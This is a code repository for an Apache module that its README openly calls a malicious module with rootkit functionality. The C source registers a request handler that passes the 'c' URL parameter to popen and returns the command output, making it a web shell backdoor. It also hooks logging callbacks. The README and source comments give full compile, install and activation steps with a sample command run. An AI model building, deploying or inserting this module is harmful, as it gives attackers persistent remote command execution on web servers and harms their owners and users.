├── .deps
├── modules.mk
├── README.md
├── Makefile
└── mod_authg.c
/.deps:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/modules.mk:
--------------------------------------------------------------------------------
1 | mod_authg.la: mod_authg.slo
2 | $(SH_LINK) -rpath $(libexecdir) -module -avoid-version mod_authg.lo
3 | DISTCLEAN_TARGETS = modules.mk
4 | shared = mod_authg.la
5 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # apache-rootkit
2 | A malicious Apache module with rootkit functionality
3 | C. Papathanasiou 2015
4 |
5 | Compile by running:
6 | ```
7 | $ apxs -c -i mod_authg.c
8 | ```
9 | Then activate it in Apache's apache2.conf file for instance
10 | for the URL /authg in as follows:
11 | ```
12 | # apache2.conf
13 | LoadModule authg_module modules/mod_authg.so
14 |
15 | SetHandler authg
16 |
17 | ```
18 | Then after restarting Apache via
19 | ```
20 | $ apachectl restart
21 | ```
22 | you immediately can request the URL /authg?c=cmd and watch for the
23 | output of this module. This can be achieved for instance via:
24 | ```
25 | $ lynx -mime_header http://localhost/authg?c=id
26 | ```
27 | The output should be similar to the following one:
28 | ```
29 | HTTP/1.1 200 OK
30 | Date: Thu, 19 Feb 2015 16:33:30 GMT
31 | Server: Apache/2.4.7 (Ubuntu)
32 | Content-Length: 54
33 | Connection: close
34 | Content-Type: text/html
35 |
36 | uid=33(www-data) gid=33(www-data) groups=33(www-data)
37 | ```
38 | Created for demo purposes only, no liability accepted.
39 |
--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
1 | ##
2 | ## Makefile -- Build procedure for sample authg Apache module
3 | ## Autogenerated via ``apxs -n authg -g''.
4 | ##
5 |
6 | builddir=.
7 | top_srcdir=/usr/share/apache2
8 | top_builddir=/usr/share/apache2
9 | include /usr/share/apache2/build/special.mk
10 |
11 | # the used tools
12 | APXS=apxs
13 | APACHECTL=apachectl
14 |
15 | # additional defines, includes and libraries
16 | #DEFS=-Dmy_define=my_value
17 | #INCLUDES=-Imy/include/dir
18 | #LIBS=-Lmy/lib/dir -lmylib
19 |
20 | # the default target
21 | all: local-shared-build
22 |
23 | # install the shared object file into Apache
24 | install: install-modules-yes
25 |
26 | # cleanup
27 | clean:
28 | -rm -f mod_authg.o mod_authg.lo mod_authg.slo mod_authg.la
29 |
30 | # simple test
31 | test: reload
32 | lynx -mime_header http://localhost/authg
33 |
34 | # install and activate shared object by reloading Apache to
35 | # force a reload of the shared object file
36 | reload: install restart
37 |
38 | # the general Apache start/restart/stop
39 | # procedures
40 | start:
41 | $(APACHECTL) start
42 | restart:
43 | $(APACHECTL) restart
44 | stop:
45 | $(APACHECTL) stop
46 |
47 |
--------------------------------------------------------------------------------
/mod_authg.c:
--------------------------------------------------------------------------------
1 | /*
2 | ** mod_authg.c -- Apache module rootkit C. Papathanasiou (2015)
3 | ** [Semi-Autogenerated via ``apxs -n authg -g'']
4 | **
5 | ** To play with this module first compile it into a
6 | ** DSO file and install it into Apache's modules directory
7 | ** by running:
8 | **
9 | ** $ apxs -c -i mod_authg.c
10 | **
11 | ** Then activate it in Apache's apache2.conf file for instance
12 | ** for the URL /authg in as follows:
13 | **
14 | ** # apache2.conf
15 | ** LoadModule authg_module modules/mod_authg.so
16 | **
17 | ** SetHandler authg
18 | **
19 | **
20 | ** Then after restarting Apache via
21 | **
22 | ** $ apachectl restart
23 | **
24 | ** you immediately can request the URL /authg?c=cmd and watch for the
25 | ** output of this module. This can be achieved for instance via:
26 | **
27 | ** $ lynx -mime_header http://localhost/authg?c=id
28 | **
29 | ** The output should be similar to the following one:
30 | **
31 | ** HTTP/1.1 200 OK
32 | ** Date: Thu, 19 Feb 2015 16:33:30 GMT
33 | ** Server: Apache/2.4.7 (Ubuntu)
34 | ** Content-Length: 54
35 | ** Connection: close
36 | ** Content-Type: text/html
37 | **
38 | ** uid=33(www-data) gid=33(www-data) groups=33(www-data)
39 | **
40 | */
41 |
42 | #include "httpd.h"
43 | #include "http_config.h"
44 | #include "http_protocol.h"
45 | #include "http_log.h"
46 | #include "ap_config.h"
47 | #include
48 | #include
49 |
50 | static int authg_handler(request_rec *r)
51 | {
52 | apr_table_t *GET;
53 | apr_array_header_t *POST;
54 | const char *c;
55 | FILE *fp;
56 | char path[1024];
57 | if (strcmp(r->handler, "authg")) {
58 | return DECLINED;
59 | }
60 | ap_args_to_table(r, &GET);
61 | ap_parse_form_data(r, NULL, &POST, -1, 8192);
62 | ap_set_content_type(r, "text/html");
63 | c = apr_table_get(GET, "c");
64 | fp = popen(c,"r");
65 | if (fp == NULL) {
66 | return OK;
67 | }
68 | while (fgets(path, sizeof(path)-1,fp) != NULL) {
69 | ap_rprintf(r,"%s",path);
70 | }
71 | pclose(fp);
72 | return OK;
73 | }
74 |
75 | static int log_handler(request_rec *r) {
76 |
77 | return DECLINED;
78 | }
79 | static int log_open_handler(request_rec *r) {
80 |
81 | return DECLINED;
82 | }
83 | static void authg_register_hooks(apr_pool_t *p)
84 | {
85 | ap_hook_handler(authg_handler, NULL, NULL, APR_HOOK_MIDDLE);
86 | ap_hook_open_logs(log_open_handler,NULL,NULL,APR_HOOK_MIDDLE);
87 | ap_hook_log_transaction(log_handler,NULL,NULL,APR_HOOK_MIDDLE);
88 | }
89 |
90 | module AP_MODULE_DECLARE_DATA authg_module = {
91 | STANDARD20_MODULE_STUFF,
92 | NULL, /* create per-dir config structures */
93 | NULL, /* merge per-dir config structures */
94 | NULL, /* create per-server config structures */
95 | NULL, /* merge per-server config structures */
96 | NULL, /* table of config file commands */
97 | authg_register_hooks /* register hooks */
98 | };
99 |
--------------------------------------------------------------------------------